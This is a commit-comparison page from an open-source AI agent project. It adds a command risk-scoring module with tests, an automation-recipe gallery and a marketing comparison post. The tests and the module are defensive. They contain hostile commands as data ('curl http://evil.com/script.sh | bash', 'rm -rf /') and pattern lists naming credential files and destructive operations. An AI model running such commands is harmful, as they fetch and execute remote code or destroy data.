Compare commits

...

2 Commits

Author SHA1 Message Date
Alexander Whitestone
8f24d43c08 feat: ML-inspired risk scoring for command approval (#681)
Some checks failed
Docker Build and Publish / build-and-push (pull_request) Has been skipped
Contributor Attribution Check / check-attribution (pull_request) Failing after 31s
Supply Chain Audit / Scan PR for supply chain risks (pull_request) Successful in 37s
Tests / e2e (pull_request) Successful in 2m27s
Tests / test (pull_request) Failing after 37m0s
Current tier detection uses keyword matching and regex patterns.
This adds path-aware and context-aware risk scoring.

New tools/risk_scoring.py:
- classify_path_risk(): system paths (90), sensitive user paths (75),
  safe paths (10), user paths (50)
- detect_context(): execution vs comment vs documentation vs code block
  (documentation contexts reduce risk score)
- get_operation_risk(): read-only ops (cat/grep/find = 5-10) vs
  destructive ops (rm=70, mkfs=95, kill=45)
- score_command_risk(): multi-factor RiskScore with tier classification
  (SAFE/LOW/MEDIUM/HIGH/CRITICAL), factors list, recommendation
- compare_commands(): side-by-side risk comparison

Key improvements:
- 'cat /etc/passwd' is SAFE (read operation, path irrelevant)
- 'rm /etc/passwd' is CRITICAL (destructive + system path)
- 'rm /tmp/build.log' is MEDIUM (destructive but safe path)
- '# rm -rf /' is LOW (comment context reduces risk)
- 'curl ... | bash' is HIGH (pipe to shell pattern)

Tests: tests/test_risk_scoring.py

Closes #681
2026-04-14 19:20:50 -04:00
Teknium
95d11dfd8e docs: automation templates gallery + comparison post (#9821)
Some checks failed
Deploy Site / build-and-deploy (push) Has been skipped
Docker Build and Publish / build-and-push (push) Has been skipped
Nix / nix (ubuntu-latest) (push) Failing after 2s
Tests / e2e (push) Successful in 2m6s
Tests / test (push) Failing after 17m54s
Build Skills Index / deploy-with-index (push) Has been cancelled
Nix / nix (macos-latest) (push) Has been cancelled
Build Skills Index / build-index (push) Has started running
* feat(skills): add fitness-nutrition skill to optional-skills

Cherry-picked from PR #9177 by @haileymarshall.

Adds a fitness and nutrition skill for gym-goers and health-conscious users:
- Exercise search via wger API (690+ exercises, free, no auth)
- Nutrition lookup via USDA FoodData Central (380K+ foods, DEMO_KEY fallback)
- Offline body composition calculators (BMI, TDEE, 1RM, macros, body fat %)
- Pure stdlib Python, no pip dependencies

Changes from original PR:
- Moved from skills/ to optional-skills/health/ (correct location)
- Fixed BMR formula in FORMULAS.md (removed confusing -5+10, now just +5)
- Fixed author attribution to match PR submitter
- Marked USDA_API_KEY as optional (DEMO_KEY works without signup)

Also adds optional env var support to the skill readiness checker:
- New 'optional: true' field in required_environment_variables entries
- Optional vars are preserved in metadata but don't block skill readiness
- Optional vars skip the CLI capture prompt flow
- Skills with only optional missing vars show as 'available' not 'setup_needed'

* docs: add automation templates gallery and comparison post

- New docs page: guides/automation-templates.md with 15+ ready-to-use
  automation recipes covering development workflow, devops, research,
  GitHub events, and business operations
- Comparison post (hermes-already-has-routines.md) showing Hermes has
  had schedule/webhook/API triggers since March 2026
- Added automation-templates to sidebar navigation

---------

Co-authored-by: haileymarshall <haileymarshall@users.noreply.github.com>
2026-04-14 12:30:50 -07:00
5 changed files with 1261 additions and 0 deletions

View File

@@ -0,0 +1,160 @@
# Hermes Agent Has Had "Routines" Since March
Anthropic just announced [Claude Code Routines](https://claude.com/blog/introducing-routines-in-claude-code) — scheduled tasks, GitHub event triggers, and API-triggered agent runs. Bundled prompt + repo + connectors, running on their infrastructure.
It's a good feature. We shipped it two months ago.
---
## The Three Trigger Types — Side by Side
Claude Code Routines offers three ways to trigger an automation:
**1. Scheduled (cron)**
> "Every night at 2am: pull the top bug from Linear, attempt a fix, and open a draft PR."
Hermes equivalent — works today:
```bash
hermes cron create "0 2 * * *" \
"Pull the top bug from the issue tracker, attempt a fix, and open a draft PR." \
--name "Nightly bug fix" \
--deliver telegram
```
**2. GitHub Events (webhook)**
> "Flag PRs that touch the /auth-provider module and post to #auth-changes."
Hermes equivalent — works today:
```bash
hermes webhook subscribe auth-watch \
--events "pull_request" \
--prompt "PR #{pull_request.number}: {pull_request.title} by {pull_request.user.login}. Check if it touches the auth-provider module. If yes, summarize the changes." \
--deliver slack
```
**3. API Triggers**
> "Read the alert payload, find the owning service, post a triage summary to #oncall."
Hermes equivalent — works today:
```bash
hermes webhook subscribe alert-triage \
--prompt "Alert: {alert.name} — Severity: {alert.severity}. Find the owning service, investigate, and post a triage summary with proposed first steps." \
--deliver slack
```
Every use case in their blog post — backlog triage, docs drift, deploy verification, alert correlation, library porting, bespoke PR review — has a working Hermes implementation. No new features needed. It's been shipping since March 2026.
---
## What's Different
| | Claude Code Routines | Hermes Agent |
|---|---|---|
| **Scheduled tasks** | ✅ Schedule-based | ✅ Any cron expression + human-readable intervals |
| **GitHub triggers** | ✅ PR, issue, push events | ✅ Any GitHub event via webhook subscriptions |
| **API triggers** | ✅ POST to unique endpoint | ✅ POST to webhook routes with HMAC auth |
| **MCP connectors** | ✅ Native connectors | ✅ Full MCP client support |
| **Script pre-processing** | ❌ | ✅ Python scripts run before agent, inject context |
| **Skill chaining** | ❌ | ✅ Load multiple skills per automation |
| **Daily limit** | 5-25 runs/day | **Unlimited** |
| **Model choice** | Claude only | **Any model** — Claude, GPT, Gemini, DeepSeek, Qwen, local |
| **Delivery targets** | GitHub comments | Telegram, Discord, Slack, SMS, email, GitHub comments, webhooks, local files |
| **Infrastructure** | Anthropic's servers | **Your infrastructure** — VPS, home server, laptop |
| **Data residency** | Anthropic's cloud | **Your machines** |
| **Cost** | Pro/Max/Team/Enterprise subscription | Your API key, your rates |
| **Open source** | No | **Yes** — MIT license |
---
## Things Hermes Does That Routines Can't
### Script Injection
Run a Python script *before* the agent. The script's stdout becomes context. The script handles mechanical work (fetching, diffing, computing); the agent handles reasoning.
```bash
hermes cron create "every 1h" \
"If CHANGE DETECTED, summarize what changed. If NO_CHANGE, respond with [SILENT]." \
--script ~/.hermes/scripts/watch-site.py \
--name "Pricing monitor" \
--deliver telegram
```
The `[SILENT]` pattern means you only get notified when something actually happens. No spam.
### Multi-Skill Workflows
Chain specialized skills together. Each skill teaches the agent a specific capability, and the prompt ties them together.
```bash
hermes cron create "0 8 * * *" \
"Search arXiv for papers on language model reasoning. Save the top 3 as Obsidian notes." \
--skills "arxiv,obsidian" \
--name "Paper digest"
```
### Deliver Anywhere
One automation, any destination:
```bash
--deliver telegram # Telegram home channel
--deliver discord # Discord home channel
--deliver slack # Slack channel
--deliver sms:+15551234567 # Text message
--deliver telegram:-1001234567890:42 # Specific Telegram forum topic
--deliver local # Save to file, no notification
```
### Model-Agnostic
Your nightly triage can run on Claude. Your deploy verification can run on GPT. Your cost-sensitive monitors can run on DeepSeek or a local model. Same automation system, any backend.
---
## The Limits Tell the Story
Claude Code Routines: **5 routines per day** on Pro. **25 on Enterprise.** That's their ceiling.
Hermes has no daily limit. Run 500 automations a day if you want. The only constraint is your API budget, and you choose which models to use for which tasks.
A nightly backlog triage on Sonnet costs roughly $0.02-0.05. A monitoring check on DeepSeek costs fractions of a cent. You control the economics.
---
## Get Started
Hermes Agent is open source and free. The automation infrastructure — cron scheduler, webhook platform, skill system, multi-platform delivery — is built in.
```bash
pip install hermes-agent
hermes setup
```
Set up a scheduled task in 30 seconds:
```bash
hermes cron create "0 9 * * 1" \
"Generate a weekly AI news digest. Search the web for major announcements, trending repos, and notable papers. Keep it under 500 words with links." \
--name "Weekly digest" \
--deliver telegram
```
Set up a GitHub webhook in 60 seconds:
```bash
hermes gateway setup # enable webhooks
hermes webhook subscribe pr-review \
--events "pull_request" \
--prompt "Review PR #{pull_request.number}: {pull_request.title}" \
--skills "github-code-review" \
--deliver github_comment
```
Full automation templates gallery: [hermes-agent.nousresearch.com/docs/guides/automation-templates](https://hermes-agent.nousresearch.com/docs/guides/automation-templates)
Documentation: [hermes-agent.nousresearch.com](https://hermes-agent.nousresearch.com)
GitHub: [github.com/NousResearch/hermes-agent](https://github.com/NousResearch/hermes-agent)
---
*Hermes Agent is built by [Nous Research](https://nousresearch.com). Open source, model-agnostic, runs on your infrastructure.*

111
tests/test_risk_scoring.py Normal file
View File

@@ -0,0 +1,111 @@
"""Tests for risk scoring module."""
import pytest
import sys
from pathlib import Path
sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
from tools.risk_scoring import (
classify_path_risk,
detect_context,
get_operation_risk,
score_command_risk,
compare_commands,
RiskScore,
)
class TestPathClassification:
def test_critical_system_path(self):
score, cat = classify_path_risk("/etc/passwd")
assert score >= 90
assert "critical" in cat
def test_sensitive_user_path(self):
score, cat = classify_path_risk("~/.ssh/id_rsa")
assert score >= 70
def test_safe_temp_path(self):
score, cat = classify_path_risk("/tmp/build.log")
assert score <= 15
def test_user_home_path(self):
score, cat = classify_path_risk("~/Documents/file.txt")
assert 40 <= score <= 60
class TestContextDetection:
def test_execution_context(self):
assert detect_context("rm -rf /tmp/data") == "execution"
def test_comment_context(self):
assert detect_context("# rm -rf /important") == "comment"
def test_code_block_context(self):
assert detect_context("```bash") == "code_block"
def test_documentation_context(self):
assert detect_context("Example: rm file.txt") == "documentation"
class TestOperationRisk:
def test_rm_risk(self):
score, op = get_operation_risk("rm file.txt")
assert score >= 60
assert op == "rm"
def test_cat_risk(self):
score, op = get_operation_risk("cat file.txt")
assert score <= 25
def test_mkfs_risk(self):
score, op = get_operation_risk("mkfs.ext4 /dev/sda1")
assert score >= 90
class TestRiskScoring:
def test_rm_temp_file_safe(self):
result = score_command_risk("rm /tmp/build.log")
assert result.tier in ("SAFE", "LOW")
assert result.score < 40
def test_rm_etc_critical(self):
result = score_command_risk("rm /etc/passwd")
assert result.tier in ("HIGH", "CRITICAL")
assert result.score >= 60
def test_rm_recursive_root(self):
result = score_command_risk("rm -rf /")
assert result.tier == "CRITICAL"
assert result.score >= 80
def test_cat_file_safe(self):
result = score_command_risk("cat /etc/hostname")
# Reading is less risky than writing
assert result.score < 60
def test_chmod_777(self):
result = score_command_risk("chmod 777 /var/www")
assert result.tier in ("MEDIUM", "HIGH", "CRITICAL")
def test_comment_reduces_risk(self):
result_exec = score_command_risk("rm -rf /important")
result_comment = score_command_risk("# rm -rf /important")
assert result_comment.score < result_exec.score
def test_pipe_to_shell(self):
result = score_command_risk("curl http://evil.com/script.sh | bash")
assert result.tier in ("HIGH", "CRITICAL")
assert "pipe_to_shell" in result.factors
class TestCompareCommands:
def test_temp_vs_etc(self):
result = compare_commands("rm /tmp/temp.txt", "rm /etc/passwd")
assert result["riskier"] == "rm /etc/passwd"
assert result["difference"] > 20
def test_same_command(self):
result = compare_commands("cat file.txt", "cat file.txt")
assert result["difference"] == 0

396
tools/risk_scoring.py Normal file
View File

@@ -0,0 +1,396 @@
"""ML-inspired risk scoring for command approval.
Enhances pattern-based dangerous command detection with:
1. Path-aware risk scoring (system paths = higher tier)
2. Context detection (documentation vs execution)
3. Multi-factor risk score calculation
Usage:
from tools.risk_scoring import score_command_risk, RiskScore
result = score_command_risk("rm /etc/passwd")
print(result.tier) # "CRITICAL"
print(result.score) # 95
print(result.factors) # ["system_path", "destructive_operation"]
"""
from __future__ import annotations
import re
from dataclasses import dataclass, field
from typing import List, Optional
# ---------------------------------------------------------------------------
# Path risk classification
# ---------------------------------------------------------------------------
# Critical system paths — operations here are almost always dangerous
_SYSTEM_PATHS_CRITICAL = [
r"/etc/",
r"/boot/",
r"/sys/",
r"/proc/",
r"/dev/sd",
r"/dev/nvme",
r"/usr/bin/",
r"/usr/sbin/",
r"/sbin/",
r"/bin/",
r"/lib/systemd/",
r"/var/log/syslog",
r"/var/log/auth",
]
# Sensitive user paths — important but user-scoped
_SENSITIVE_USER_PATHS = [
r"\.ssh/",
r"\.gnupg/",
r"\.aws/",
r"\.config/gcloud/",
r"\.kube/config",
r"\.docker/config",
r"\.hermes/\.env",
r"\.netrc",
r"\.pgpass",
r"id_rsa",
r"id_ed25519",
]
# Safe/temp paths — operations here are usually benign
_SAFE_PATHS = [
r"/tmp/",
r"/var/tmp/",
r"\.cache/",
r"temp",
r"tmp",
r"\.log$",
r"\.bak$",
r"\.old$",
r"\.swp$",
r"node_modules/",
r"__pycache__/",
r"\.pyc$",
]
# Dangerous user paths — home dir but destructive
_DANGEROUS_USER_PATHS = [
r"~/",
r"\$HOME/",
r"/home/\w+/",
]
def classify_path_risk(path: str) -> tuple[int, str]:
"""Classify a filesystem path's risk level.
Returns (risk_score, category) where risk_score is 0-100.
"""
path_lower = path.lower()
# Check critical system paths
for pattern in _SYSTEM_PATHS_CRITICAL:
if re.search(pattern, path_lower):
return 90, "system_path_critical"
# Check sensitive user paths
for pattern in _SENSITIVE_USER_PATHS:
if re.search(pattern, path_lower):
return 75, "sensitive_user_path"
# Check safe paths
for pattern in _SAFE_PATHS:
if re.search(pattern, path_lower):
return 10, "safe_path"
# Check dangerous user paths
for pattern in _DANGEROUS_USER_PATHS:
if re.search(pattern, path_lower):
return 50, "user_path"
# Default: moderate risk for unknown paths
return 30, "unknown_path"
# ---------------------------------------------------------------------------
# Context detection
# ---------------------------------------------------------------------------
def detect_context(command: str) -> str:
"""Detect the context of a command string.
Returns one of:
- "code_block": Inside a markdown code block (likely documentation)
- "comment": Shell comment (# ...)
- "heredoc_content": Content inside a heredoc (documentation)
- "execution": Normal command execution
"""
stripped = command.strip()
# Markdown code fence
if stripped.startswith("```"):
return "code_block"
# Shell comment
if stripped.startswith("#"):
return "comment"
# Inline comment (command followed by #)
if re.search(r'\s+#\s', command) and not re.search(r'[;&|]\s*#', command):
# Might be a comment in the middle
pass
# Heredoc content indicators
if re.search(r"<<\s*['\"]?\w+['\"]?", command):
return "heredoc_content"
# Documentation indicators
doc_indicators = [
r"example:",
r"e\.g\.",
r"i\.e\.",
r"note:",
r"warning:",
r"see also:",
r"documentation",
r"README",
r"man page",
r"help:",
]
for indicator in doc_indicators:
if re.search(indicator, command, re.IGNORECASE):
return "documentation"
return "execution"
# ---------------------------------------------------------------------------
# Operation risk classification
# ---------------------------------------------------------------------------
_OPERATION_RISK = {
# Destructive operations
"rm": 70,
"rmdir": 50,
"shred": 90,
"dd": 60,
"mkfs": 95,
"fdisk": 85,
"wipefs": 90,
# Permission changes
"chmod": 40,
"chown": 50,
"setfacl": 50,
# System control
"systemctl": 60,
"service": 55,
"reboot": 90,
"shutdown": 90,
"halt": 90,
"poweroff": 90,
# Process control
"kill": 45,
"killall": 55,
"pkill": 55,
# Network
"iptables": 70,
"ufw": 60,
"firewall-cmd": 60,
# Package management
"apt-get": 30,
"yum": 30,
"dnf": 30,
"pacman": 30,
"pip": 20,
"npm": 15,
# Git
"git reset --hard": 50, "git reset": 30,
"git push": 30,
"git clean": 45,
"git branch": 20,
# Dangerous pipes
"curl": 25,
"wget": 25,
}
# Read-only operations — low risk even on system paths
_READONLY_OPERATIONS = {
"cat": 5, "head": 5, "tail": 5, "less": 5, "more": 5,
"grep": 5, "find": 10, "ls": 3, "dir": 3, "tree": 3,
"file": 3, "stat": 3, "wc": 3, "diff": 5, "md5sum": 5,
"sha256sum": 5, "which": 3, "whereis": 3, "type": 3,
"readlink": 3, "realpath": 3, "basename": 3, "dirname": 3,
}
def get_operation_risk(command: str) -> tuple[int, str]:
"""Get the risk score for the operation in a command.
Returns (risk_score, operation_name).
"""
cmd_lower = command.lower().strip()
# Check read-only operations first (low risk regardless of path)
for op, score in sorted(_READONLY_OPERATIONS.items(), key=lambda x: -len(x[0])):
if cmd_lower.startswith(op + " ") or cmd_lower.startswith(op + "\t") or cmd_lower == op:
return score, op
# Check compound operations
for op, score in sorted(_OPERATION_RISK.items(), key=lambda x: -len(x[0])):
if cmd_lower.startswith(op) or f" {op}" in cmd_lower:
return score, op
return 20, "unknown"
# ---------------------------------------------------------------------------
# Risk score calculation
# ---------------------------------------------------------------------------
@dataclass
class RiskScore:
"""Result of risk scoring for a command."""
command: str
score: int = 0 # 0-100 risk score
tier: str = "SAFE" # SAFE, LOW, MEDIUM, HIGH, CRITICAL
factors: List[str] = field(default_factory=list)
path_risk: int = 0
operation_risk: int = 0
context: str = "execution"
context_modifier: float = 1.0
recommendation: str = ""
def __post_init__(self):
if not self.recommendation:
self.recommendation = self._generate_recommendation()
def _generate_recommendation(self) -> str:
if self.tier == "CRITICAL":
return "BLOCK — requires explicit user approval"
elif self.tier == "HIGH":
return "WARN — confirm with user before executing"
elif self.tier == "MEDIUM":
return "CAUTION — log and proceed with care"
elif self.tier == "LOW":
return "NOTE — low risk, proceed normally"
return "OK — safe to execute"
def score_command_risk(command: str) -> RiskScore:
"""Calculate a comprehensive risk score for a command.
Considers:
- Pattern-based detection (existing DANGEROUS_PATTERNS)
- Path risk (system paths, user paths, temp paths)
- Operation risk (rm vs cat vs echo)
- Context (documentation vs execution)
"""
result = RiskScore(command=command)
factors = []
# 1. Path analysis
paths = re.findall(r'[/~$][^\s;&|\'"]*', command)
max_path_risk = 0
for path in paths:
risk, category = classify_path_risk(path)
if risk > max_path_risk:
max_path_risk = risk
if risk >= 50:
factors.append(f"path:{category}")
result.path_risk = max_path_risk
# 2. Operation risk
op_risk, op_name = get_operation_risk(command)
result.operation_risk = op_risk
if op_risk >= 40:
factors.append(f"operation:{op_name}")
# 3. Context detection
ctx = detect_context(command)
result.context = ctx
# Context modifiers: documentation contexts reduce risk
context_modifiers = {
"execution": 1.0,
"code_block": 0.3,
"comment": 0.1,
"heredoc_content": 0.5,
"documentation": 0.2,
}
result.context_modifier = context_modifiers.get(ctx, 1.0)
# 4. Special pattern bonuses
destructive_patterns = [
(r'\brm\s+-[^s]*r', 20, "recursive_delete"),
(r'\brm\s+/', 15, "root_delete"),
(r'\bchmod\s+777', 15, "world_writable"),
(r'\bDROP\s+TABLE', 25, "sql_drop"),
(r'\bDELETE\s+FROM(?!.*WHERE)', 20, "sql_delete_no_where"),
(r'\|\s*(ba)?sh\b', 20, "pipe_to_shell"),
(r'--force', 10, "force_flag"),
(r'--no-preserve-root', 30, "no_preserve_root"),
]
for pattern, bonus, factor_name in destructive_patterns:
if re.search(pattern, command, re.IGNORECASE):
result.score += bonus
factors.append(factor_name)
# 5. Calculate final score
# Read operations on system paths are safe (just looking, not touching)
is_read_op = result.operation_risk <= 10
if is_read_op:
# Read operations: mostly operation risk, path barely matters
base_score = result.operation_risk + (result.path_risk * 0.05)
elif result.path_risk >= 80:
# Write to system path: very dangerous
base_score = result.path_risk + (result.operation_risk * 0.5)
elif result.path_risk <= 15:
# Write to safe path: mostly operation risk
base_score = result.path_risk + (result.operation_risk * 0.3)
else:
# Moderate path: balanced
base_score = result.path_risk + (result.operation_risk * 0.4)
base_score += result.score # pattern bonuses
result.score = min(100, int(base_score * result.context_modifier))
# 6. Determine tier
if result.score >= 80:
result.tier = "CRITICAL"
elif result.score >= 60:
result.tier = "HIGH"
elif result.score >= 40:
result.tier = "MEDIUM"
elif result.score >= 20:
result.tier = "LOW"
else:
result.tier = "SAFE"
result.factors = factors
if not result.recommendation:
result.recommendation = result._generate_recommendation()
return result
def compare_commands(cmd1: str, cmd2: str) -> dict:
"""Compare risk scores of two commands.
Useful for showing why "rm temp.txt" is different from "rm /etc/passwd".
"""
r1 = score_command_risk(cmd1)
r2 = score_command_risk(cmd2)
return {
"command_1": {"command": cmd1, "score": r1.score, "tier": r1.tier},
"command_2": {"command": cmd2, "score": r2.score, "tier": r2.tier},
"difference": abs(r1.score - r2.score),
"riskier": cmd1 if r1.score > r2.score else cmd2,
}

View File

@@ -0,0 +1,593 @@
---
sidebar_position: 15
title: "Automation Templates"
description: "Ready-to-use automation recipes — scheduled tasks, GitHub event triggers, API webhooks, and multi-skill workflows"
---
# Automation Templates
Copy-paste recipes for common automation patterns. Each template uses Hermes's built-in [cron scheduler](/docs/user-guide/features/cron) for time-based triggers and [webhook platform](/docs/user-guide/messaging/webhooks) for event-driven triggers.
Every template works with **any model** — not locked to a single provider.
:::tip Three Trigger Types
| Trigger | How | Tool |
|---------|-----|------|
| **Schedule** | Runs on a cadence (hourly, nightly, weekly) | `cronjob` tool or `/cron` slash command |
| **GitHub Event** | Fires on PR opens, pushes, issues, CI results | Webhook platform (`hermes webhook subscribe`) |
| **API Call** | External service POSTs JSON to your endpoint | Webhook platform (config.yaml routes or `hermes webhook subscribe`) |
All three support delivery to Telegram, Discord, Slack, SMS, email, GitHub comments, or local files.
:::
---
## Development Workflow
### Nightly Backlog Triage
Label, prioritize, and summarize new issues every night. Delivers a digest to your team channel.
**Trigger:** Schedule (nightly)
```bash
hermes cron create "0 2 * * *" \
"You are a project manager triaging the NousResearch/hermes-agent GitHub repo.
1. Run: gh issue list --repo NousResearch/hermes-agent --state open --json number,title,labels,author,createdAt --limit 30
2. Identify issues opened in the last 24 hours
3. For each new issue:
- Suggest a priority label (P0-critical, P1-high, P2-medium, P3-low)
- Suggest a category label (bug, feature, docs, security)
- Write a one-line triage note
4. Summarize: total open issues, new today, breakdown by priority
Format as a clean digest. If no new issues, respond with [SILENT]." \
--name "Nightly backlog triage" \
--deliver telegram
```
### Automatic PR Code Review
Review every pull request automatically when it's opened. Posts a review comment directly on the PR.
**Trigger:** GitHub webhook
**Option A — Dynamic subscription (CLI):**
```bash
hermes webhook subscribe github-pr-review \
--events "pull_request" \
--prompt "Review this pull request:
Repository: {repository.full_name}
PR #{pull_request.number}: {pull_request.title}
Author: {pull_request.user.login}
Action: {action}
Diff URL: {pull_request.diff_url}
Fetch the diff with: curl -sL {pull_request.diff_url}
Review for:
- Security issues (injection, auth bypass, secrets in code)
- Performance concerns (N+1 queries, unbounded loops, memory leaks)
- Code quality (naming, duplication, error handling)
- Missing tests for new behavior
Post a concise review. If the PR is a trivial docs/typo change, say so briefly." \
--skills "github-code-review" \
--deliver github_comment
```
**Option B — Static route (config.yaml):**
```yaml
platforms:
webhook:
enabled: true
extra:
port: 8644
secret: "your-global-secret"
routes:
github-pr-review:
events: ["pull_request"]
secret: "github-webhook-secret"
prompt: |
Review PR #{pull_request.number}: {pull_request.title}
Repository: {repository.full_name}
Author: {pull_request.user.login}
Diff URL: {pull_request.diff_url}
Review for security, performance, and code quality.
skills: ["github-code-review"]
deliver: "github_comment"
deliver_extra:
repo: "{repository.full_name}"
pr_number: "{pull_request.number}"
```
Then in GitHub: **Settings → Webhooks → Add webhook** → Payload URL: `http://your-server:8644/webhooks/github-pr-review`, Content type: `application/json`, Secret: `github-webhook-secret`, Events: **Pull requests**.
### Docs Drift Detection
Weekly scan of merged PRs to find API changes that need documentation updates.
**Trigger:** Schedule (weekly)
```bash
hermes cron create "0 9 * * 1" \
"Scan the NousResearch/hermes-agent repo for documentation drift.
1. Run: gh pr list --repo NousResearch/hermes-agent --state merged --json number,title,files,mergedAt --limit 30
2. Filter to PRs merged in the last 7 days
3. For each merged PR, check if it modified:
- Tool schemas (tools/*.py) — may need docs/reference/tools-reference.md update
- CLI commands (hermes_cli/commands.py, hermes_cli/main.py) — may need docs/reference/cli-commands.md update
- Config options (hermes_cli/config.py) — may need docs/user-guide/configuration.md update
- Environment variables — may need docs/reference/environment-variables.md update
4. Cross-reference: for each code change, check if the corresponding docs page was also updated in the same PR
Report any gaps where code changed but docs didn't. If everything is in sync, respond with [SILENT]." \
--name "Docs drift detection" \
--deliver telegram
```
### Dependency Security Audit
Daily scan for known vulnerabilities in project dependencies.
**Trigger:** Schedule (daily)
```bash
hermes cron create "0 6 * * *" \
"Run a dependency security audit on the hermes-agent project.
1. cd ~/.hermes/hermes-agent && source .venv/bin/activate
2. Run: pip audit --format json 2>/dev/null || pip audit 2>&1
3. Run: npm audit --json 2>/dev/null (in website/ directory if it exists)
4. Check for any CVEs with CVSS score >= 7.0
If vulnerabilities found:
- List each one with package name, version, CVE ID, severity
- Check if an upgrade is available
- Note if it's a direct dependency or transitive
If no vulnerabilities, respond with [SILENT]." \
--name "Dependency audit" \
--deliver telegram
```
---
## DevOps & Monitoring
### Deploy Verification
Trigger smoke tests after every deployment. Your CI/CD pipeline POSTs to the webhook when a deploy completes.
**Trigger:** API call (webhook)
```bash
hermes webhook subscribe deploy-verify \
--events "deployment" \
--prompt "A deployment just completed:
Service: {service}
Environment: {environment}
Version: {version}
Deployed by: {deployer}
Run these verification steps:
1. Check if the service is responding: curl -s -o /dev/null -w '%{http_code}' {health_url}
2. Search recent logs for errors: check the deployment payload for any error indicators
3. Verify the version matches: curl -s {health_url}/version
Report: deployment status (healthy/degraded/failed), response time, any errors found.
If healthy, keep it brief. If degraded or failed, provide detailed diagnostics." \
--deliver telegram
```
Your CI/CD pipeline triggers it:
```bash
curl -X POST http://your-server:8644/webhooks/deploy-verify \
-H "Content-Type: application/json" \
-H "X-Hub-Signature-256: sha256=$(echo -n '{"service":"api","environment":"prod","version":"2.1.0","deployer":"ci","health_url":"https://api.example.com/health"}' | openssl dgst -sha256 -hmac 'your-secret' | cut -d' ' -f2)" \
-d '{"service":"api","environment":"prod","version":"2.1.0","deployer":"ci","health_url":"https://api.example.com/health"}'
```
### Alert Triage
Correlate monitoring alerts with recent changes to draft a response. Works with Datadog, PagerDuty, Grafana, or any alerting system that can POST JSON.
**Trigger:** API call (webhook)
```bash
hermes webhook subscribe alert-triage \
--prompt "Monitoring alert received:
Alert: {alert.name}
Severity: {alert.severity}
Service: {alert.service}
Message: {alert.message}
Timestamp: {alert.timestamp}
Investigate:
1. Search the web for known issues with this error pattern
2. Check if this correlates with any recent deployments or config changes
3. Draft a triage summary with:
- Likely root cause
- Suggested first response steps
- Escalation recommendation (P1-P4)
Be concise. This goes to the on-call channel." \
--deliver slack
```
### Uptime Monitor
Check endpoints every 30 minutes. Only notify when something is down.
**Trigger:** Schedule (every 30 min)
```python title="~/.hermes/scripts/check-uptime.py"
import urllib.request, json, time
ENDPOINTS = [
{"name": "API", "url": "https://api.example.com/health"},
{"name": "Web", "url": "https://www.example.com"},
{"name": "Docs", "url": "https://docs.example.com"},
]
results = []
for ep in ENDPOINTS:
try:
start = time.time()
req = urllib.request.Request(ep["url"], headers={"User-Agent": "Hermes-Monitor/1.0"})
resp = urllib.request.urlopen(req, timeout=10)
elapsed = round((time.time() - start) * 1000)
results.append({"name": ep["name"], "status": resp.getcode(), "ms": elapsed})
except Exception as e:
results.append({"name": ep["name"], "status": "DOWN", "error": str(e)})
down = [r for r in results if r.get("status") == "DOWN" or (isinstance(r.get("status"), int) and r["status"] >= 500)]
if down:
print("OUTAGE DETECTED")
for r in down:
print(f" {r['name']}: {r.get('error', f'HTTP {r[\"status\"]}')} ")
print(f"\nAll results: {json.dumps(results, indent=2)}")
else:
print("NO_ISSUES")
```
```bash
hermes cron create "every 30m" \
"If the script reports OUTAGE DETECTED, summarize which services are down and suggest likely causes. If NO_ISSUES, respond with [SILENT]." \
--script ~/.hermes/scripts/check-uptime.py \
--name "Uptime monitor" \
--deliver telegram
```
---
## Research & Intelligence
### Competitive Repository Scout
Monitor competitor repos for interesting PRs, features, and architectural decisions.
**Trigger:** Schedule (daily)
```bash
hermes cron create "0 8 * * *" \
"Scout these AI agent repositories for notable activity in the last 24 hours:
Repos to check:
- anthropics/claude-code
- openai/codex
- All-Hands-AI/OpenHands
- Aider-AI/aider
For each repo:
1. gh pr list --repo <repo> --state all --json number,title,author,createdAt,mergedAt --limit 15
2. gh issue list --repo <repo> --state open --json number,title,labels,createdAt --limit 10
Focus on:
- New features being developed
- Architectural changes
- Integration patterns we could learn from
- Security fixes that might affect us too
Skip routine dependency bumps and CI fixes. If nothing notable, respond with [SILENT].
If there are findings, organize by repo with brief analysis of each item." \
--skills "competitive-pr-scout" \
--name "Competitor scout" \
--deliver telegram
```
### AI News Digest
Weekly roundup of AI/ML developments.
**Trigger:** Schedule (weekly)
```bash
hermes cron create "0 9 * * 1" \
"Generate a weekly AI news digest covering the past 7 days:
1. Search the web for major AI announcements, model releases, and research breakthroughs
2. Search for trending ML repositories on GitHub
3. Check arXiv for highly-cited papers on language models and agents
Structure:
## Headlines (3-5 major stories)
## Notable Papers (2-3 papers with one-sentence summaries)
## Open Source (interesting new repos or major releases)
## Industry Moves (funding, acquisitions, launches)
Keep each item to 1-2 sentences. Include links. Total under 600 words." \
--name "Weekly AI digest" \
--deliver telegram
```
### Paper Digest with Notes
Daily arXiv scan that saves summaries to your note-taking system.
**Trigger:** Schedule (daily)
```bash
hermes cron create "0 8 * * *" \
"Search arXiv for the 3 most interesting papers on 'language model reasoning' OR 'tool-use agents' from the past day. For each paper, create an Obsidian note with the title, authors, abstract summary, key contribution, and potential relevance to Hermes Agent development." \
--skills "arxiv,obsidian" \
--name "Paper digest" \
--deliver local
```
---
## GitHub Event Automations
### Issue Auto-Labeling
Automatically label and respond to new issues.
**Trigger:** GitHub webhook
```bash
hermes webhook subscribe github-issues \
--events "issues" \
--prompt "New GitHub issue received:
Repository: {repository.full_name}
Issue #{issue.number}: {issue.title}
Author: {issue.user.login}
Action: {action}
Body: {issue.body}
Labels: {issue.labels}
If this is a new issue (action=opened):
1. Read the issue title and body carefully
2. Suggest appropriate labels (bug, feature, docs, security, question)
3. If it's a bug report, check if you can identify the affected component from the description
4. Post a helpful initial response acknowledging the issue
If this is a label or assignment change, respond with [SILENT]." \
--deliver github_comment
```
### CI Failure Analysis
Analyze CI failures and post diagnostics on the PR.
**Trigger:** GitHub webhook
```yaml
# config.yaml route
platforms:
webhook:
enabled: true
extra:
routes:
ci-failure:
events: ["check_run"]
secret: "ci-secret"
prompt: |
CI check failed:
Repository: {repository.full_name}
Check: {check_run.name}
Status: {check_run.conclusion}
PR: #{check_run.pull_requests.0.number}
Details URL: {check_run.details_url}
If conclusion is "failure":
1. Fetch the log from the details URL if accessible
2. Identify the likely cause of failure
3. Suggest a fix
If conclusion is "success", respond with [SILENT].
deliver: "github_comment"
deliver_extra:
repo: "{repository.full_name}"
pr_number: "{check_run.pull_requests.0.number}"
```
### Auto-Port Changes Across Repos
